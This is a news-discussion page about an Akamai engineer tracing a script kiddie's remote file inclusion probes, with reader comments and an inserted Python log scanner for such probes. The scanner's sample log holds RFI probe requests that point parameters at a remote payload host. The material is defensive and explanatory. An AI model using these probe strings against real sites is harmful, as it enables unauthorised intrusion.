Submitted via IRC for Bytram
Think you have bad luck? Imagine being the script kiddie who inadvertently tried and failed to pwn an Akamai security pro.
Larry Cashdollar, a senior security response engineer at the US-based global web giant, told us late last week he just recently noticed something peculiar in the logs on his personal website. Further investigation turned up signs of someone scanning for remote file inclusion (RFI) vulnerabilities.
[...] He told The Register his site's logs showed the would-be attacker probing for RFI holes that would allow them to trick web applications into fetching and running a remote malicious script. In this case, the scumbag was trying, unsuccessfully, to load a file via a custom tool Cashdollar had created for his site.
"Based on my log entries they appear to be parsing web sites looking for form variables and automatically testing if those variables allow remote file inclusion," Cashdollar told El Reg.
"It's a generic test against any website where they can parse out the form input variable and then supply a URL to that variable to see if the content is included and executed."
Unfortunately for the attacker, Cashdollar also used the logs to follow the GET requests to the payload the attacker was trying to load: a script that attempted to harvest information about his server. By dissecting that and other files the hacker had ready to execute commands and take over vulnerable websites, Cashdollar was also able to extract the criminal's email address and their preferred language – Portuguese.
[...] The Akamai security engineer told El Reg that, for admins, the big takeaway from his experience is the importance of watching logs, patching site management tools, and writing web code that cannot be exploited for RFI.
"Make sure their application patches are up to date," Cashdollar advised. "Keep track of any new vulnerabilities discovered in software they're using for content management and site delivery and patch when new vulnerabilities are disclosed by the vendor."
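The behaviour Cashdollar describes, an automated scanner feeding a remote URL into every form or query variable it can find, leaves a recognisable trace in an ordinary access log: query parameters whose value is an absolute http/https/ftp URL pointing at a third-party host. The following script is an added example (not Cashdollar's tool and not from The Register article) showing how an admin could scan Apache combined-format logs for that pattern and pull out the payload hosts worth following up on. The log lines, the allowlisted `/redirect?url=` parameter and all IP addresses are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-log lines; none of these come from a real server.
SAMPLE_LOG = """\
203.0.113.7 - - [28/Jul/2019:03:14:07 +0000] "GET /index.php?page=http://198.51.100.23/x.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [28/Jul/2019:03:14:08 +0000] "GET /tool.php?file=https://198.51.100.23/x.txt HTTP/1.1" 404 210 "-" "Mozilla/5.0"
192.0.2.10 - - [28/Jul/2019:03:15:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
192.0.2.11 - - [28/Jul/2019:03:16:22 +0000] "GET /redirect?url=https://example.org/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.77 - - [28/Jul/2019:03:17:45 +0000] "POST /contact.php?template=ftp://198.51.100.23/t.txt HTTP/1.1" 200 88 "-" "curl/7.64"
"""

# Enough of the combined log format to recover source IP, timestamp, request target and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Schemes a PHP-style include would happily fetch from if allow_url_include were on.
REMOTE_SCHEMES = {"http", "https", "ftp"}

# (path, parameter) pairs that legitimately carry a full URL on this hypothetical site.
# Without an allowlist like this a redirector or link-preview endpoint floods the report.
URL_PARAM_ALLOWLIST = {("/redirect", "url")}


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not a request record."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def remote_url_params(target):
    """Split a request target into its path and the (param, value) pairs whose value is a remote URL."""
    parts = urlsplit(target)
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        u = urlsplit(value.strip())
        if u.scheme.lower() in REMOTE_SCHEMES and u.netloc:
            hits.append((name, value))
    return parts.path, hits


def detect_rfi_probes(log_text):
    """One finding per (request, parameter) where a non-allowlisted parameter was fed a remote URL."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        path, hits = remote_url_params(rec["target"])
        for name, value in hits:
            if (path, name) in URL_PARAM_ALLOWLIST:
                continue
            findings.append({
                "src": rec["ip"],
                "ts": rec["ts"],
                "path": path,
                "param": name,
                "payload_url": value,
                "payload_host": urlsplit(value.strip()).hostname,
                "status": int(rec["status"]),
            })
    return findings


def summarize_by_source(findings):
    """Per source IP: the distinct (path, param) targets it probed and the payload hosts it pointed at."""
    summary = defaultdict(lambda: {"probes": set(), "payload_hosts": set()})
    for f in findings:
        summary[f["src"]]["probes"].add((f["path"], f["param"]))
        summary[f["src"]]["payload_hosts"].add(f["payload_host"])
    return dict(summary)


if __name__ == "__main__":
    found = detect_rfi_probes(SAMPLE_LOG)
    for f in found:
        print(f'{f["ts"]} {f["src"]} probed {f["path"]}?{f["param"]}= with {f["payload_url"]} (status {f["status"]})')
    for src, info in summarize_by_source(found).items():
        print(f'{src}: {len(info["probes"])} parameter(s) probed, payload host(s) {sorted(info["payload_hosts"])}')
```

The response status is kept in each finding because it is the first thing to check: a 200 on a probed parameter does not prove the include ran, but it is the request to reproduce against the application code, while the payload host list is what lets an admin do what Cashdollar did and look at what the scanner was actually trying to pull in.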
(Score: 0) by Anonymous Coward on Tuesday July 30 2019, @04:58AM (1 child)
I wonder how much the ad costs.
(Score: 0) by Anonymous Coward on Tuesday July 30 2019, @02:56PM
The guy's name is Cashdollar, which must be where the negotiations begin.
(Score: 0) by Anonymous Coward on Tuesday July 30 2019, @05:36AM (2 children)
Do they still exist? I thought cloudflare had completely eaten their lunch.
(Score: 1, Insightful) by Anonymous Coward on Tuesday July 30 2019, @07:28AM (1 child)
Akamai is huge. They are probably the biggest CDN still. While many smaller sites and companies still use them, many of the largest do. Plus, they have all sorts of government contracts. The main reason, I think, most newer or smaller websites and startups skip them is that Akamai doesn't have much public information available, especially when it comes to pricing. You have to go through the sales department. However, a buddy at a Fortune 500 said they are very price competitive, extremely responsive, and know how to schmooze the higher ups.
(Score: 0) by Anonymous Coward on Wednesday August 07 2019, @07:29PM
Although they had/have some sort of data sharing agreement.
But if it wasn't for Akamai a lot of web caching would have never happened and Google+Dejanews might be the only stuff that wasn't purged.
(Score: 1, Funny) by Anonymous Coward on Tuesday July 30 2019, @06:45AM (1 child)
Sounds like a bad rapper's stage name.
(Score: 0) by Anonymous Coward on Tuesday July 30 2019, @02:49PM
That ship sailed when we let Moxie Marlinspike speak with any authority.
(Score: 1, Touché) by Anonymous Coward on Tuesday July 30 2019, @01:11PM (1 child)
Seems a bit weak, he got the attacker's email and preferred language, wow. And then what happened? If you open with that title and statements I expect the script kiddie to get pwned upon much harsher than that.
(Score: 0) by Anonymous Coward on Tuesday July 30 2019, @04:13PM
Well, Paige Thompson [apnews.com] wasn't as lucky as Señor Portugal who has an email address. Thompson even used Tor and a VPN.
(Score: 0) by Anonymous Coward on Tuesday July 30 2019, @04:58PM
i am sure all the successful pwns of akamai security researchers news will fall from the web like dead flies hosted on "content distribution networks by akamai" ...
(Score: 2, Funny) by jmichaelhudsondotnet on Tuesday July 30 2019, @05:24PM
If your last name is obviously made up you have to explain on your homepage when it was made up and by whom and why. You can't just say that's what they gave your great great grandpa at Ellis island.
I once had a boss named Bud Challenger, one of the worst people I have ever worked for. Someone out there has to have heard of this guy. It was in Hawaii. Like I said, I don't believe he's real until he tells me how he got that name.
At any rate, Akamai is bad news, look up their details and run away.
But thanks Mr. Cashdollar for the inspiring story. We should all scrape our honeypot logs nightly for interesting attackers we can countersurveil. The last apache log I looked at had several hundred chinese javascript requests per hour that looked like this:
klsdjfj29035j12o54n1jf0jw09j120rj123rj120j09fj3jr092j390j2fo2jf2j3f0923jf2pfj203j9f293jf2fj29023j2pfjkfj02j3.js
There was a garage door in the building that just kept randomly opening and no one could figure out why, but now I'm starting to put it all together.
(Score: 0) by Anonymous Coward on Tuesday July 30 2019, @05:31PM
...script kiddie violates GDPR against themselves. Okay, no that's not the case, however given current laws/stupidity, I can easily imagine a world where this scenario triggers some combination that lands both parties in trouble. Fail2Ban script kiddies and be done with it.